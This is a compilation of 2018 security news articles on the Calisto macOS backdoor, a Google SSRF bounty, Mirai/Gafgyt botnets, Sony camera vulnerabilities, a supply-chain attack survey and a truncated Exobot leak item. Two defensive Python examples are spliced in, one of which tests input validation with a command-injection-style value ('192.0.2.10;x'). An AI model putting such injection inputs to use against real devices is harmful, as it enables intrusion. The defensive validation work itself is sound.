23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto's characteristics, Kaspersky says, bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguised as a Symantec product), its code contains the string “com.proton.calisto.plist,” and it can steal a lot of personal data from the system, including the contents of the Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.

SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.
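The bypass above shows why a domain allow-list on its own is not a boundary for a server-side fetcher: a provider domain under which users can place content is still "trusted" by the check. The following is an added example, not code from Google, Caja or the researcher; it validates a fetch target by both allow-listing the host and checking every address the host resolves to, with the resolver injectable so it runs offline. The `example.com` suffix and the resolver table are assumptions for illustration.

```python
import ipaddress
import socket
from typing import Callable, List, Optional
from urllib.parse import urlsplit

# Hypothetical allow-list of host suffixes the fetcher may contact.
ALLOWED_SUFFIXES = ("example.com",)

Resolver = Callable[[str], List[str]]


def default_resolver(host: str) -> List[str]:
    """Real DNS lookup: every A/AAAA answer for host (needs network access)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def host_allowed(host: str) -> bool:
    """Exact match or proper subdomain of an allow-listed suffix."""
    return any(host == s or host.endswith("." + s) for s in ALLOWED_SUFFIXES)


def is_safe_fetch_target(url: str, resolver: Resolver = default_resolver) -> bool:
    """True only if scheme, host allow-list and *all* resolved addresses pass.

    The address check is what the allow-list cannot provide: it rejects loopback,
    RFC 1918, link-local (including the 169.254.169.254 metadata address) and
    other non-global space even when the name itself looks trustworthy.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host or parts.username or parts.password:  # reject user@host confusion
        return False
    if not host_allowed(host):
        return False
    try:
        addrs = resolver(host)
    except OSError:
        return False
    if not addrs:
        return False
    for a in addrs:
        try:
            ip = ipaddress.ip_address(a)
        except ValueError:
            return False
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 must be judged as 10.0.0.1
        if not ip.is_global:
            return False
    return True


def first_unsafe_hop(hops: List[str], resolver: Resolver = default_resolver) -> Optional[str]:
    """Re-validate every URL in a redirect chain; return the first that fails, else None.

    A fetcher that follows redirects blindly can be steered from an allowed host to an
    internal one, so each Location target must pass the same check as the original URL.
    """
    for url in hops:
        if not is_safe_fetch_target(url, resolver):
            return url
    return None
```

To defeat DNS rebinding the address checked here should also be the address actually connected to (pin the resolved IP and set the `Host` header yourself) rather than resolving the name a second time inside the HTTP client.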

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue, and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher with various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.

Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago also noted.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

The botnet uses a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution flaw, and a remote code execution flaw in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices by using iptables to drop packets received on certain ports.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign used the same exploits as the first series of attacks, but also attempted credential brute-force attacks, some of them using the default credentials of Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

The attacks used nearly all the same exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single command source.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.

Sony Patches Remotely Exploitable Vulnerabilities in Network Cameras
23.7.2018 securityweek

Two serious, remotely exploitable vulnerabilities in Sony IPELA E Series Network Camera products could allow attackers to execute commands or arbitrary code on affected devices.

Tracked as CVE-2018-3937, the first of the vulnerabilities is a command injection flaw in the measurementBitrateExec functionality of the IPELA E Series Network Camera. These are network-facing devices used for monitoring and surveillance.

The issue was discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos, who explain that arbitrary commands could be executed via a specially crafted GET request. An attacker looking to trigger the vulnerability would only need to send such an HTTP request.

“While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” the researchers explain.

The second vulnerability is tracked as CVE-2018-3938 and affects the 802dot1xclientcert.cgi functionality of IPELA E Series Camera devices.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” Cisco says.

The 802dot1xclientcert.cgi endpoint, the security researchers explain, is “designed to handle everything related to certificate management for 802.1x.”

When data is received, certain checks are performed and the data is then directly copied to a local buffer via memcpy. However, because the length obtained with strlen is not checked against the size of the destination buffer, a stack-based buffer overflow occurs and an attacker can abuse it to remotely execute commands on the device.
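Both bugs come down to a missing check before untrusted input reaches a dangerous sink: the `-c` server address reaches `system()` unvalidated (CVE-2018-3937), and the certificate body reaches `memcpy` without comparing its length to the destination (CVE-2018-3938). The following is an added example written for this page, not Sony firmware or Talos code, showing the two defensive patterns a request handler should apply: allow-list the address and spawn without a shell, and bound the length before copying. The measurement tool path, the argument layout and the 4096-byte limit are assumptions for illustration.

```python
import re
import subprocess
from typing import List

# Allow-list grammar for a hostname or IPv4 literal: alphanumerics, dots and hyphens only.
# Anything a shell could interpret (; | & $ ` quotes, whitespace) is simply not matchable.
_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

# Hypothetical fixed-size destination for the certificate body (the real size is not on the page).
MAX_CERT_LEN = 4096


def validate_server_address(addr: str) -> bool:
    """Positive validation of the value that ends up after -c."""
    return bool(_HOST_RE.match(addr)) and ".." not in addr and not addr.endswith(".")


def build_measurement_argv(addr: str, tool: str = "/usr/bin/measure-bitrate") -> List[str]:
    """Build an argv list for a shell-free spawn; raises ValueError on bad input.

    Even if the regex were imperfect, passing a list with shell=False means no shell
    ever parses the address, so metacharacters cannot turn it into a second command.
    The tool path is a placeholder, not the camera's real helper.
    """
    if not validate_server_address(addr):
        raise ValueError("invalid server address")
    return [tool, "-c", addr]


def run_measurement(addr: str) -> subprocess.CompletedProcess:
    """Hardened replacement for building a string and calling system()."""
    return subprocess.run(build_measurement_argv(addr), shell=False,
                          capture_output=True, timeout=30)


def accept_certificate_body(body: bytes, max_len: int = MAX_CERT_LEN) -> bytes:
    """The check the CGI handler was missing: compare the length to the buffer first.

    Returns the body unchanged when it fits; raises before any copy when it does not.
    """
    if len(body) > max_len:
        raise ValueError(f"certificate payload too large: {len(body)} > {max_len}")
    return body


if __name__ == "__main__":
    for candidate in ("192.0.2.10", "cam-01.example.net", "192.0.2.10;x", "a b"):
        print(f"{candidate!r:24} valid={validate_server_address(candidate)}")
    print(build_measurement_argv("192.0.2.10"))
    print(len(accept_certificate_body(b"-----BEGIN CERTIFICATE-----\n", max_len=64)), "bytes accepted")
```

The same two ideas carry over to the original C: reject the address against a positive pattern and use `execve` with an argv array instead of `system()`, and compare the `strlen` result to `sizeof(buffer)` before `memcpy`.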

Both vulnerabilities were reported to Sony last month. Featuring a CVSS score of 9.1, both of these issues were found in Sony IPELA E series G5 firmware 1.87.00. Sony released an update last week to address the security bugs.

Software Supply Chain Increasingly Targeted in Attacks: Survey
23.7.2018 securityweek Hacking

Organizations increasingly have to deal with cyberattacks targeting the software supply chain and in many cases they are not adequately prepared to respond to such incidents, according to a report published on Monday by endpoint security firm CrowdStrike.

In supply chain attacks, malicious actors target software makers in an effort to modify their products so that they perform malicious actions or provide a backdoor into the targeted environment.

The NotPetya attack, which involved a Ukrainian tax software firm, and the CCleaner incident, which involved hacking of distribution servers at Piriform, are some of the most well-known examples, but supply chain attacks are becoming increasingly common.

Vanson Bourne, on behalf of CrowdStrike, surveyed 1,300 senior IT decision makers and security professionals in the U.S., Canada, Mexico, the U.K., Australia, Japan, Germany and Singapore in April and May.

The Securing the Supply Chain report shows that roughly one-third of organizations are concerned about supply chain attacks, with 18% and 38% saying that the risk is high and moderate, respectively.

Approximately two-thirds of respondents have experienced some form of supply chain attack. The biotechnology and pharmaceutical sector takes the lead with 82% of organizations encountering such an incident, including 45% being hit in the last 12 months. Other sectors more likely to encounter supply chain attacks include hospitality, entertainment and media (74%), IT and technology (74%), engineering (73%), healthcare (70%) and insurance (68%).

Supply chain attacks

On average, organizations believe it would take them 10 hours to detect an incident, 13 hours to react, 15 hours to respond, and 25 hours to remediate it, which totals 63 hours, the report shows.

A vast majority of respondents that have encountered a supply chain incident reported a financial impact, with an average cost of roughly $1.1 million. The highest costs were reported by the hospitality, entertainment and media sector ($1.44 million) and the lowest in the government sector ($329,000).

Some companies have also paid a ransom to recover from a supply chain attack, with many respondents saying their own organization or others in their industry had paid.

In addition to financial loss, organizations experienced various types of drawbacks following an attack, including the necessity to completely rebuild IT systems (36%), spend more on security (36%), and service/operations disruption (34%).

When it comes to response strategies, over one-third of respondents said they had a comprehensive strategy in place when they suffered an attack and more than half had some level of response pre-planned.

Trust in suppliers is not very high, with only 35% of respondents saying they had been totally certain they would be informed of a cybersecurity incident. On the other hand, 39% of those surveyed said they had lost trust in a supplier over the past year.

Less than a third of the organizations that took part in the survey vetted all suppliers in the past 12 months, and the high-profile attacks that came to light last year made the vetting process more rigorous in 59% of cases. Executives have also started changing their attitude with regard to this threat, with 31% becoming more involved, 49% planning to become more involved, and 13% taking more of an interest.

The source code of the Exobot Android banking trojan has been leaked online
23.7.2018 securityaffairs Android

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.
The source code of the Exobot Android banking trojan has been leaked online, and experts believe that we will soon see a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors were advertising it saying that it can be used for phishing attacks, it implements various features of most com